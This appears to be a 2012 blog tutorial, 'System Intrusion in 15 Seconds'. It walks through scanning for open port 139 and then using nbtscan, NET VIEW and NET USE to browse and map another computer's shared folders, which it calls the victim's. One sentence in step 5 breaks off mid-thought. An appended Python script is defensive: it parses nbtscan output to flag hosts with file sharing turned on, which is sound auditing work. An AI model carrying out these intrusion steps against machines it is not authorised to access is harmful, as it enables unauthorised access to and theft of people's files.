Thursday 12 July 2012

SYSTEM INTRUSION IN 15 SECONDS


Particular services run on specific ports: up to a certain port number, each port is assigned to a particular service. For example, FTP (File Transfer Protocol) runs on port 21, Telnet runs on port 23 and the NetBIOS service runs on port 139.

NetBIOS is used for file sharing on a network. It runs on port 139, which means shared files can be accessed through port 139.

Detailed Information:

First of all, you have to get the nbtscan exe file. Place a copy of the exe file in the system32 folder inside the Windows folder on the C drive. You will then be able to use it at the command prompt; otherwise you will receive the "not internal or external command" error.

Step By Step:

1:- First of all, check whether port 139 is open on any computer on the LAN or the internet.

2:- For that, use any port scanner (for example SuperScan). Provide a range of IP addresses to it and scan. It will list all the open ports on each IP address. If you have a specific IP, then use Nmap, which can be downloaded from the official website.

Look carefully at which IP address has port 139 open, or, if using Nmap, whether that port is open.

3:- Note/remember that IP address.

4:- Now go to Start > Run > Cmd and press Enter.



Once you get the command prompt, type the following to perform the attack:
(1) nbtscan -v <ip address>
The IP address is the address of the computer which has port 139 open.
Example output is shown below. OUTPUT OF COMMAND PROMPT:


Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\DON >nbtscan -v 10.1.A.76

(Note: A is any numeric value; don't get confused by it.)

Doing NBT name scan for addresses from 10.1.A.76
NetBIOS Name Table for Host 10.1.A.76:
Name             Service          Type
----------------------------------------
BATA-SERVER      <00>             UNIQUE
MSHOME           <00>             GROUP
BATA-SERVER      <03>             UNIQUE
BATA-SERVER      <20>             UNIQUE
MSHOME           <1e>             GROUP
Adapter address: 00-02-44-a8-b8-77
----------------------------------------

5:- Look carefully at the Service column in the table above: if <20> is there, this means some files are shared on that computer.
The numbers in the <> are hex code values. What we are
interested in is the “Hex Code” number of <20>. If you do not
see a hex code of <20> in the list that’s a good thing. If you do
have a hex code <20> then you may have cause for concern.

A hex code of <20> means you have file and printer sharing
turned on. This is how a “hacker” would check to see if you
have “file and printer sharing” turned on. If he/she becomes
aware of the fact that you do have “file and printer sharing”
turned on then they

6:- After this you will surely want to view all the shared files or folders on that computer. For that, use the net command at the command prompt.

Type the following at command prompt:

NET VIEW \\<IP ADDRESS>

This will show you all the shared files and folders on that computer.

Our potential hacker would then get a response that looks something like this.
Shared resources at \\ip_address
Sharename                       Type   Comment
MY DOCUMENTS                    Disk
TEMP                            Disk
The command was completed successfully.

7:- Once you get this, you will definitely want to access the shared files or folders.

For that just type the following at the command prompt:

NET USE C: \\<IP ADDRESS>\temp

8:- You now have access to the shared files and folders on that computer, and the NetBIOS attack has been performed successfully. At this point the hacker now has access to the TEMP directory of his victim.
Q. The approximate time it takes for the average hacker to do
this attack?
A. 15 seconds or less.
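
The <20> check from step 5 can be run over your own machines to find which ones have file and printer sharing turned on. The following is an added example, not code from the original post: it parses saved `nbtscan -v` output and lists hosts that register a UNIQUE <20> name. The sample output, the addresses in it and the function names are constructed for the example.

```python
import re

# Constructed sample of `nbtscan -v` output, modelled on the listing in
# step 4 (host addresses and the second machine are made up for the example).
SAMPLE = """\
NetBIOS Name Table for Host 10.1.0.76:
Name             Service          Type
----------------------------------------
BATA-SERVER      <00>             UNIQUE
MSHOME           <00>             GROUP
BATA-SERVER      <03>             UNIQUE
BATA-SERVER      <20>             UNIQUE
MSHOME           <1e>             GROUP
Adapter address: 00-02-44-a8-b8-77
----------------------------------------
NetBIOS Name Table for Host 10.1.0.80:
Name             Service          Type
----------------------------------------
FRONTDESK        <00>             UNIQUE
MSHOME           <00>             GROUP
Adapter address: 00-02-44-a8-b8-90
----------------------------------------
"""

HOST_RE = re.compile(r"^NetBIOS Name Table for Host (\S+?):\s*$")
ENTRY_RE = re.compile(r"^(.+?)\s+<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s*$")

def parse_name_tables(text):
    """Return {host: [(name, suffix, type), ...]} from nbtscan -v output."""
    tables, host = {}, None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:                      # start of a new host's name table
            host = m.group(1)
            tables[host] = []
            continue
        m = ENTRY_RE.match(line)   # header and separator lines do not match
        if m and host is not None:
            tables[host].append((m.group(1).strip(), m.group(2).lower(), m.group(3)))
    return tables

def hosts_advertising_file_sharing(tables):
    """Hosts with a UNIQUE <20> entry, i.e. file and printer sharing turned on."""
    return sorted(h for h, rows in tables.items()
                  if any(s == "20" and t == "UNIQUE" for _, s, t in rows))

if __name__ == "__main__":
    for host in hosts_advertising_file_sharing(parse_name_tables(SAMPLE)):
        print(f"{host}: <20> registered, review or disable file and printer sharing")
```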
